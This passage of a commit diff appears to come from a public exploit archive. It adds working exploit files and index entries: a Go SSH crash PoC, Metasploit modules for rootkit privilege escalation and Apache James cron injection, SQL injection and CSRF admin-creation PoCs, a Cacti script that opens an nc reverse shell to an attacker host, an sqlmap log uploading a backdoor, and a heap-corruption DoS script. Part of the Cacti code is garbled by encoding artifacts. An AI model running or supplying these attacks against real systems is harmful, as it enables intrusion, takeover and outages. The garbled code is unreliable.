value stored in the "password" field, without the word "password" actually appearing in
the query. If the query contains the word "password" Manage Engine will not execute the query.
2. restrictions on printing the password field to the screen in a column called "password".
If the results of the query include a columncalled "password", Manage Engine will mask the
password with a series of asterisks "". This query will output the entire contents of the table,
without formatting is as a table within the web interface, which leads to bypass of this security
control.
Remediated Product Version:
ManageEngine EventLog Analyzer Build 12110
Reference:
https://www.manageengine.com/products/eventlog/
https://www.manageengine.com/products/eventlog/features-new.html#release
https://gist.github.com/scottgoodwin90/19ccecdc9f5733c0a9381765cfc7fe39
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19774
https://ocd-tech.com

61
exploits/linux/dos/48121.py Executable file
View file

@ -0,0 +1,61 @@
# Exploit Title: Go SSH servers 0.0.2 - Denial of Service (PoC)
# Author: Mark Adams
# Date: 2020-02-21
# Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py
# CVE: CVE-2020-9283
#
# Running this script may crash the remote SSH server if it is vulnerable.
# The GitHub repository contains a vulnerable and fixed SSH server for testing.
#
# $ python poc.py
# ./poc.py <host> <port> <user>
#
# $ python poc.py localhost 2022 root
# Malformed auth request sent. This should cause a panic on the remote server.
#
#!/usr/bin/env python
import socket
import sys
import paramiko
from paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST
if len(sys.argv) != 4:
print('./poc.py <host> <port> <user>')
sys.exit(1)
host = sys.argv[1]
port = int(sys.argv[2])
user = sys.argv[3]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
t = paramiko.Transport(sock)
t.start_client()
t.lock.acquire()
m = paramiko.Message()
m.add_byte(cMSG_SERVICE_REQUEST)
m.add_string("ssh-userauth")
t._send_message(m)
m = paramiko.Message()
m.add_byte(cMSG_USERAUTH_REQUEST)
m.add_string(user)
m.add_string("ssh-connection")
m.add_string('publickey')
m.add_boolean(True)
m.add_string('ssh-ed25519')
# Send an SSH key that is too short (ed25519 keys are 32 bytes)
m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x15key-that-is-too-short')
# Send an empty signature (the server won't get far enough to validate it)
m.add_string(b'\x00\x00\x00\x0bssh-ed25519\x00\x00\x00\x00')
t._send_message(m)
print('Malformed auth request sent. This should cause a panic on the remote server.')

115
exploits/linux/local/48131.rb Executable file
View file

@ -0,0 +1,115 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Diamorphine Rootkit Signal Privilege Escalation',
'Description' => %q{
This module uses Diamorphine rootkit's privesc feature using signal
64 to elevate the privileges of arbitrary processes to UID 0 (root).
This module has been tested successfully with Diamorphine from `master`
branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
},
'License' => MSF_LICENSE,
'Author' =>
[
'm0nad', # Diamorphine
'bcoles' # Metasploit
],
'DisclosureDate' => '2013-11-07', # Diamorphine first public commit
'References' =>
[
['URL', 'https://github.com/m0nad/Diamorphine']
],
'Platform' => ['linux'],
'Arch' => [ARCH_X86, ARCH_X64],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [['Auto', {}]],
'Notes' =>
{
'Reliability' => [ REPEATABLE_SESSION ],
'Stability' => [ CRASH_SAFE ]
},
'DefaultTarget' => 0))
register_options [
OptInt.new('SIGNAL', [true, 'Diamorphine elevate signal', 64])
]
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
]
end
def signal
datastore['SIGNAL'].to_s
end
def base_dir
datastore['WritableDir'].to_s
end
def upload_and_chmodx(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
write_file path, data
chmod path, 0755
end
def cmd_exec_elevated(cmd)
vprint_status "Executing #{cmd} ..."
res = cmd_exec("sh -c 'kill -#{signal} $$ && #{cmd}'").to_s
vprint_line res unless res.blank?
res
end
def check
res = cmd_exec_elevated 'id'
if res.include?('invalid signal')
return CheckCode::Safe("Signal '#{signal}' is invalid")
end
unless res.include?('uid=0')
return CheckCode::Safe("Diamorphine is not installed, or incorrect signal '#{signal}'")
end
CheckCode::Vulnerable("Diamorphine is installed and configured to handle signal '#{signal}'.")
end
def exploit
unless check == CheckCode::Vulnerable
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
if is_root?
unless datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
end
unless writable? base_dir
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
payload_name = ".#{rand_text_alphanumeric 8..12}"
payload_path = "#{base_dir}/#{payload_name}"
upload_and_chmodx payload_path, generate_payload_exe
register_file_for_cleanup payload_path
cmd_exec_elevated "#{payload_path} & echo "
end
end

198
exploits/linux/remote/48130.rb Executable file
View file

@ -0,0 +1,198 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => "Apache James Server 2.3.2 Insecure User Creation Arbitrary File Write",
'Description' => %q{
This module exploits a vulnerability that exists due to a lack of input
validation when creating a user. Messages for a given user are stored
in a directory partially defined by the username. By creating a user
with a directory traversal payload as the username, commands can be
written to a given directory. To use this module with the cron
exploitation method, run the exploit using the given payload, host, and
port. After running the exploit, the payload will be executed within 60
seconds. Due to differences in how cron may run in certain Linux
operating systems such as Ubuntu, it may be preferable to set the
target to Bash Completion as the cron method may not work. If the target
is set to Bash completion, start a listener using the given payload,
host, and port before running the exploit. After running the exploit,
the payload will be executed when a user logs into the system. For this
exploitation method, bash completion must be enabled to gain code
execution. This exploitation method will leave an Apache James mail
object artifact in the /etc/bash_completion.d directory and the
malicious user account.
},
'License' => MSF_LICENSE,
'Author' => [
'Palaczynski Jakub', # Discovery
'Matthew Aberegg', # Metasploit
'Michael Burkey' # Metasploit
],
'References' =>
[
[ 'CVE', '2015-7611' ],
[ 'EDB', '35513' ],
[ 'URL', 'https://www.exploit-db.com/docs/english/40123-exploiting-apache-james-server-2.3.2.pdf' ]
],
'Platform' => 'linux',
'Arch' => [ ARCH_X86, ARCH_X64 ],
'Targets' =>
[
[ 'Bash Completion', {
'ExploitPath' => 'bash_completion.d',
'ExploitPrepend' => '',
'DefaultOptions' => { 'DisablePayloadHandler' => true, 'WfsDelay' => 0 }
} ],
[ 'Cron', {
'ExploitPath' => 'cron.d',
'ExploitPrepend' => '* * * * * root ',
'DefaultOptions' => { 'DisablePayloadHandler' => false, 'WfsDelay' => 90 }
} ]
],
'Privileged' => true,
'DisclosureDate' => "Oct 1 2015",
'DefaultTarget' => 1,
'CmdStagerFlavor'=> [ 'bourne', 'echo', 'printf', 'wget', 'curl' ]
))
register_options(
[
OptString.new('USERNAME', [ true, 'Root username for James remote administration tool', 'root' ]),
OptString.new('PASSWORD', [ true, 'Root password for James remote administration tool', 'root' ]),
OptString.new('ADMINPORT', [ true, 'Port for James remote administration tool', '4555' ]),
OptString.new('POP3PORT', [false, 'Port for POP3 Apache James Service', '110' ]),
Opt::RPORT(25)
])
import_target_defaults
end
def check
# SMTP service check
connect
smtp_banner = sock.get_once
disconnect
unless smtp_banner.to_s.include? "JAMES SMTP Server"
return CheckCode::Safe("Target port #{rport} is not a JAMES SMTP server")
end
# James Remote Administration Tool service check
connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
admin_banner = sock.get_once
disconnect
unless admin_banner.to_s.include? "JAMES Remote Administration Tool"
return CheckCode::Safe("Target is not JAMES Remote Administration Tool")
end
# Get version number
version = admin_banner.scan(/JAMES Remote Administration Tool ([\d\.]+)/).flatten.first
# Null check
unless version
return CheckCode::Detected("Could not determine JAMES Remote Administration Tool version")
end
# Create version objects
target_version = Gem::Version.new(version)
vulnerable_version = Gem::Version.new("2.3.2")
# Check version number
if target_version > vulnerable_version
return CheckCode::Safe
elsif target_version == vulnerable_version
return CheckCode::Appears
elsif target_version < vulnerable_version
return CheckCode::Detected("Version #{version} of JAMES Remote Administration Tool may be vulnerable")
end
end
def execute_james_admin_tool_command(cmd)
username = datastore['USERNAME']
password = datastore['PASSWORD']
connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['ADMINPORT']})
sock.get_once
sock.puts(username + "\n")
sock.get_once
sock.puts(password + "\n")
sock.get_once
sock.puts(cmd)
sock.get_once
sock.puts("quit\n")
disconnect
end
def cleanup
return unless target['ExploitPath'] == "cron.d"
# Delete mail objects containing payload from cron.d
username = "../../../../../../../../etc/cron.d"
password = @account_password
begin
connect(true, {'RHOST' => datastore['RHOST'], 'RPORT' => datastore['POP3PORT']})
sock.get_once
sock.puts("USER #{username}\r\n")
sock.get_once
sock.puts("PASS #{password}\r\n")
sock.get_once
sock.puts("dele 1\r\n")
sock.get_once
sock.puts("quit\r\n")
disconnect
rescue
print_bad("Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password '#{@account_password}'")
end
# Delete malicious user
delete_user_command = "deluser ../../../../../../../../etc/cron.d\n"
execute_james_admin_tool_command(delete_user_command)
end
def execute_command(cmd, opts = {})
# Create malicious user with randomized password (message objects for this user will now be stored in /etc/bash_completion.d or /etc/cron.d)
exploit_path = target['ExploitPath']
@account_password = Rex::Text.rand_text_alpha(8..12)
add_user_command = "adduser ../../../../../../../../etc/#{exploit_path} #{@account_password}\n"
execute_james_admin_tool_command(add_user_command)
# Send payload via SMTP
payload_prepend = target['ExploitPrepend']
connect
sock.puts("ehlo admin@apache.com\r\n")
sock.get_once
sock.puts("mail from: <'@apache.com>\r\n")
sock.get_once
sock.puts("rcpt to: <../../../../../../../../etc/#{exploit_path}>\r\n")
sock.get_once
sock.puts("data\r\n")
sock.get_once
sock.puts("From: admin@apache.com\r\n")
sock.puts("\r\n")
sock.puts("'\n")
sock.puts("#{payload_prepend}#{cmd}\n")
sock.puts("\r\n.\r\n")
sock.get_once
sock.puts("quit\r\n")
sock.get_once
disconnect
end
def execute_cmdstager_end(opts)
if target['ExploitPath'] == "cron.d"
print_status("Waiting for cron to execute payload...")
else
print_status("Payload will be triggered when someone logs onto the target")
print_warning("You need to start your handler: 'handler -H #{datastore['LHOST']} -P #{datastore['LPORT']} -p #{datastore['PAYLOAD']}'")
print_warning("After payload is triggered, delete the message and account of user '../../../../../../../../etc/bash_completion.d' with password '#{@account_password}' to fully clean up exploit artifacts.")
end
end
def exploit
execute_cmdstager(background: true)
end
end

1
exploits/multiple/webapps/48108.txt Normal file
View file

@ -0,0 +1 @@
1

21
exploits/php/webapps/48109.txt Normal file
View file

@ -0,0 +1,21 @@
# Title : AMSS++ v 4.31 - 'id' SQL Injection
# Author : indoushka
# Tested on: windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)
# Vendor: http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar
# Dork: แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"
# CVE: N/A
# poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use payload : /modules/mail/main/maildetail.php?id=174
[+] http://127.0.0.1/amssplus_4_31_install/amssplus/modules/mail/main/maildetail.php?id=1 <==== inject here
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================

29
exploits/php/webapps/48113.txt Normal file
View file

@ -0,0 +1,29 @@
# Title: CandidATS 2.1.0 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-02-21
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/u/auieo/profile/
# Software Link: https://sourceforge.net/projects/candidats/files/#Version 2.1.0
# Tested on Ubuntu 19/Kali Rolling
# The Candid ATS Web application is vulnerable to CSRF to add a new admin user:
#CSRF Proof of Concept:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://HOSTNAME/Candid/index.php?m=settings&a=addUser" method="POST">
<input type="hidden" name="postback" value="postback" />
<input type="hidden" name="role" value="none" />
<input type="hidden" name="firstName" value="Test" />
<input type="hidden" name="lastName" value="User" />
<input type="hidden" name="email" value="test&#64;test&#46;com" />
<input type="hidden" name="username" value="Test" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="retypePassword" value="password" />
<input type="hidden" name="roleid" value="2" />
<input type="hidden" name="accessLevel" value="500" />
<input type="hidden" name="submit" value="Add&#32;User" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

23
exploits/php/webapps/48114.txt Normal file
View file

@ -0,0 +1,23 @@
# Title: AMSS++ 4.7 - Backdoor Admin Account
# Author: indoushka
# Date: 2020-02-23
# Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)
# Vendor : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar
# Dork : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] Use Login : admin & 1234
[+] http://127.0.0.1/innoobec/index.php
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |
|
=======================================================================================================================================

16
exploits/php/webapps/48117.txt Normal file
View file

@ -0,0 +1,16 @@
# Exploit Title: ATutor 2.2.4 - 'id' SQL Injection
# Date: 2020-02-23
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://atutor.github.io/
# Software Link: https://sourceforge.net/projects/atutor/files/latest/download
# Version: ATutor 2.2.4
# Tested on: LAMP on Ubuntu 18.04
Steps to Reproduce:
1) Login as admin user
2) Browse to the following URL:
http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17'
3) Exploiting with SQLMAP:
//Must supply valid User-Agent otherwise, there will be errors.
sqlmap --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" --dbms=mysql -u "http://192.168.51.2/atutor/mods/_core/users/admin_delete.php?id=17*" --cookie=<COOKIES HERE>

61
exploits/php/webapps/48122.txt Normal file
View file

@ -0,0 +1,61 @@
# Title: eLection 2.0 - 'id' SQL Injection
# Date: 2020-02-21
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/projects/election-by-tripath/
# Software Link: https://sourceforge.net/projects/election-by-tripath/files/#Version 2.0
# Tested on Ubuntu 19/Kali Rolling
# The eLection Web application is vulnerable to authenticated SQL Injection which leads to remote code execution:
# Login to the admin portal and browse to the candidates section. Capture the request in BurpSuite and save it to file:
POST /election/admin/ajax/op_kandidat.php HTTP/1.1
Host: HOSTNAME
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://HOSTNAME/election/admin/kandidat.php?_
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 17
Connection: close
Cookie: el_listing_panitia=5; el_mass_adding=false; el_listing_guru=5; el_listing_siswa=5; PHPSESSID=b4f0c3bbccd80e9d55fbe0269a29f96a; el_lang=en-us
aksi=fetch&id=256
Send the request to SQLMap with the following parameters:
sqlmap -r getcandidate --level=5 --risk=3 --os-shell -p id
SQLMap will find the injection:
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: aksi=fetch&id=256 AND 8584=8584
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: aksi=fetch&id=256 AND (SELECT 8551 FROM (SELECT(SLEEP(5)))nYfJ)
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: aksi=fetch&id=-9798 UNION ALL SELECT NULL,NULL,CONCAT(0x7170707171,0x676d755461434e486f49475051707357694861534e664f416f434269487042545a76454f5843584b,0x71717a7871),NULL,NULL-- dWMc
---
[09:39:07] [WARNING] unable to automatically parse any web server path
[09:39:07] [INFO] trying to upload the file stager on '/opt/lampp/htdocs/election/' via LIMIT 'LINES TERMINATED BY' method
[09:39:07] [INFO] the file stager has been successfully uploaded on '/opt/lampp/htdocs/election/' - http://HOSTNAME/election/tmpumlfm.php
[09:39:07] [INFO] the backdoor has been successfully uploaded on '/opt/lampp/htdocs/election/' - http://HOSTNAME/election/tmpbpfkq.php
[09:39:07] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
Due to the way the setup of the application requires you to change permissions on the directory of the web app, you should be able to get a shell.
https://github.com/J3rryBl4nks/eLection-TriPath-/blob/master/SQLiIntoRCE.md

102
exploits/php/webapps/48128.py Executable file
View file

@ -0,0 +1,102 @@
# Exploit Title: Cacti 1.2.8 - Remote Code Execution
# Date: 2020-02-03
# Exploit Author: Askar (@mohammadaskar2)
# CVE: CVE-2020-8813
# Vendor Homepage: https://cacti.net/
# Version: v1.2.8
# Tested on: CentOS 7.3 / PHP 7.1.33
#!/usr/bin/python3
import requests
import sys
import warnings
from bs4 import BeautifulSoup
from urllib.parse import quote
warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')
if len(sys.argv) !=3D 6:
print("[~] Usage : ./Cacti-exploit.py url username password ip port")
exit()
url =3D sys.argv[1]
username =3D sys.argv[2]
password =3D sys.argv[3]
ip =3D sys.argv[4]
port =3D sys.argv[5]
def login(token):
login_info =3D {
"login_username": username,
"login_password": password,
"action": "login",
"__csrf_magic": token
}
login_request =3D request.post(url+"/index.php", login_info)
login_text =3D login_request.text
if "Invalid User Name/Password Please Retype" in login_text:
return False
else:
return True
def enable_guest(token):
request_info =3D {
"id": "3",
"section25": "on",
"section7": "on",
"tab": "realms",
"save_component_realm_perms": 1,
"action": "save",
"__csrf_magic": token
}
enable_request =3D request.post(url+"/user_admin.php?header=3Dfalse", r=
equest_info)
if enable_request:
return True
else:
return False
def send_exploit():
payload =3D ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port)
cookies =3D {'Cacti': quote(payload)}
requests.get(url+"/graph_realtime.php?action=3Dinit", cookies=3Dcookies=
)
request =3D requests.session()
print("[+]Retrieving login CSRF token")
page =3D request.get(url+"/index.php")
html_content =3D page.text
soup =3D BeautifulSoup(html_content, "html5lib")
token =3D soup.findAll('input')[0].get("value")
if token:
print("[+]Token Found : %s" % token)
print("[+]Sending creds ..")
login_status =3D login(token)
if login_status:
print("[+]Successfully LoggedIn")
print("[+]Retrieving CSRF token ..")
page =3D request.get(url+"/user_admin.php?action=3Duser_edit&id=3D3=
&tab=3Drealms")
html_content =3D page.text
soup =3D BeautifulSoup(html_content, "html5lib")
token =3D soup.findAll('input')[1].get("value")
if token:
print("[+]Making some noise ..")
guest_realtime =3D enable_guest(token)
if guest_realtime:
print("[+]Sending malicous request, check your nc ;)")
send_exploit()
else:
print("[-]Error while activating the malicous account")
else:
print("[-] Unable to retrieve CSRF token from admin page!")
exit()
else:
print("[-]Cannot Login!")
else:
print("[-] Unable to retrieve CSRF token!")
exit()

89
exploits/windows/dos/48111.py Executable file
View file

@ -0,0 +1,89 @@
# Title: Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)
# Date: 2019-12-25
# Author: Cody Winkler
# Vendor Homepage: https://www.pablosoftwaresolutions.com/
# Software Link: https://www.pablosoftwaresolutions.com/html/quick__n_easy_web_server.html
# Version: <= 3.3.8
# Tested on: Windows 10 x64 (wow64)
# CVE: N/A
#!/usr/bin/env python
"""
Remote Unauthenticated Heap Memory Corruption in Quick N' Easy Web Server <= 3.3.8
[+] Usage: python quickwww_heap338.py <IP> <PORT>
$ python exploit.py 127.0.0.1 80
"""
from __future__ import print_function
import socket
import sys
import re
host = sys.argv[1]
port = int(sys.argv[2])
crashed = r'(503 Service Unavailable)'
http_req = "GET / HTTP/1.1\r\n"
http_req += "Host: " + "A"*15000 + "\r\n" # 50000 A's causes an interesting double free in OLEAUT32!VariantClear() when attached to debugger
http_req += "User-Agent: A\r\n"
http_req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_req += "Accept-Language: en-US,en;q=0.5\r\n"
http_req += "Cookie: A\r\n"
http_req += "Connection: Close\r\n"
http_req += "Upgrade-Insecure-Requests: 0\r\n"
http_req += "Cache-control: max-age=0\r\n\r\n"
def main():
print("[+] Remote Heap Memory Corruption in Quick n Easy Web Server <= 3.3.8")
i = 1
while( i < 1500):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(http_req)
print("[+] Spraying heap with %d 5000-byte requests" % i, end='\r')
sys.stdout.flush()
if re.search(crashed, s.recv(1024)):
print(" "*50)
print("[+] Threads have exited BAADF00D with %d requests!" % i)
s.close()
exit()
s.close()
i = i+1
except Exception, msg:
print("[-] Something went wrong :(")
print(msg)
main()
"""
0:010> kb7
# ChildEBP RetAddr Args to Child
00 06bbf4d4 77ebc1f5 77df50e4 8ae27015 01471640 ntdll!RtlpValidateHeapEntry+0x61114
01 06bbf51c 77e6b325 06bc0048 01471640 772e0f80 ntdll!RtlDebugSizeHeap+0xb3
02 06bbf53c 772e0f9b 013b0000 00000000 06bc0048 ntdll!RtlSizeHeap+0x45775
03 06bbf550 76640be7 773fcf44 06bc0048 00000008 combase!CRetailMalloc_GetSize+0x1b [onecore\com\combase\class\memapi.cxx @ 702]
04 06bbf574 766408cd 06bc0048 01471760 00451f4c OLEAUT32!APP_DATA::FreeCachedMem+0x37
05 06bbf5a8 0041ec27 06bbf5bc 05ec4fe4 05ec4f50 OLEAUT32!VariantClear+0x20d
WARNING: Stack unwind information not available. Following frames may be wrong.
06 06bbf5c4 766408cd 76cd0008 0907a724 01471254 quickweb+0x1ec27
0:010> !analyze -v
<SNIP>
STACK_TEXT:
00000000 00000000 heap_corruption!quickweb.exe+0x0
SYMBOL_NAME: heap_corruption!quickweb.exe
MODULE_NAME: heap_corruption
IMAGE_NAME: heap_corruption
STACK_COMMAND: ** Pseudo Context ** ManagedPseudo ** Value: 7ba5870 ** ; kb
FAILURE_BUCKET_ID: HEAP_CORRUPTION_80000003_heap_corruption!quickweb.exe
OS_VERSION: 10.0.17763.1
BUILDLAB_STR: rs5_release
OSPLATFORM_TYPE: x86
OSNAME: Windows 10
FAILURE_ID_HASH: {68efeb37-77bb-f968-fc16-9a1fba88436f}
"""

21
files_exploits.csv
View file

@ -6679,6 +6679,8 @@ id,file,description,date,author,type,platform,port
48034,exploits/linux/dos/48034.py,"usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init",2020-02-10,"Google Security Research",dos,linux, 48034,exploits/linux/dos/48034.py,"usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init",2020-02-10,"Google Security Research",dos,linux,
48035,exploits/multiple/dos/48035.txt,"iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()",2020-02-10,"Google Security Research",dos,multiple, 48035,exploits/multiple/dos/48035.txt,"iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()",2020-02-10,"Google Security Research",dos,multiple,
48100,exploits/windows/dos/48100.py,"Core FTP Lite 1.3 - Denial of Service (PoC)",2020-02-20,"berat isler",dos,windows, 48100,exploits/windows/dos/48100.py,"Core FTP Lite 1.3 - Denial of Service (PoC)",2020-02-20,"berat isler",dos,windows,
48111,exploits/windows/dos/48111.py,"Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)",2020-02-24,"Cody Winkler",dos,windows,
48121,exploits/linux/dos/48121.py,"Go SSH servers 0.0.2 - Denial of Service (PoC)",2020-02-24,"Mark Adams",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10970,6 +10972,8 @@ id,file,description,date,author,type,platform,port
48080,exploits/windows/local/48080.txt,"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows, 48080,exploits/windows/local/48080.txt,"DHCP Turbo 4.61298 - 'DHCP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows,
48085,exploits/windows/local/48085.txt,"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows, 48085,exploits/windows/local/48085.txt,"TFTP Turbo 4.6.1273 - 'TFTP Turbo 4' Unquoted Service Path",2020-02-17,boku,local,windows,
48087,exploits/windows/local/48087.py,"Cuckoo Clock v5.0 - Buffer Overflow",2020-02-17,boku,local,windows, 48087,exploits/windows/local/48087.py,"Cuckoo Clock v5.0 - Buffer Overflow",2020-02-17,boku,local,windows,
48129,exploits/android/local/48129.rb,"Android Binder - Use-After-Free (Metasploit)",2020-02-24,Metasploit,local,android,
48131,exploits/linux/local/48131.rb,"Diamorphine Rootkit - Signal Privilege Escalation (Metasploit)",2020-02-24,Metasploit,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -18007,6 +18011,7 @@ id,file,description,date,author,type,platform,port
48051,exploits/openbsd/remote/48051.pl,"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution",2020-02-11,"Marco Ivaldi",remote,openbsd, 48051,exploits/openbsd/remote/48051.pl,"OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution",2020-02-11,"Marco Ivaldi",remote,openbsd,
48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows, 48053,exploits/windows/remote/48053.py,"Microsoft SharePoint - Deserialization Remote Code Execution",2020-01-21,Voulnet,remote,windows,
48092,exploits/windows/remote/48092.rb,"Anviz CrossChex - Buffer Overflow (Metasploit)",2020-02-17,Metasploit,remote,windows, 48092,exploits/windows/remote/48092.rb,"Anviz CrossChex - Buffer Overflow (Metasploit)",2020-02-17,Metasploit,remote,windows,
48130,exploits/linux/remote/48130.rb,"Apache James Server 2.3.2 - Insecure User Creation Arbitrary File Write (Metasploit)",2020-02-24,Metasploit,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42378,3 +42383,19 @@ id,file,description,date,author,type,platform,port
48095,exploits/hardware/webapps/48095.pl,"DBPower C300 HD Camera - Remote Configuration Disclosure",2020-02-19,"Todor Donev",webapps,hardware, 48095,exploits/hardware/webapps/48095.pl,"DBPower C300 HD Camera - Remote Configuration Disclosure",2020-02-19,"Todor Donev",webapps,hardware,
48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware, 48098,exploits/hardware/webapps/48098.py,"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak",2020-02-19,byteGoblin,webapps,hardware,
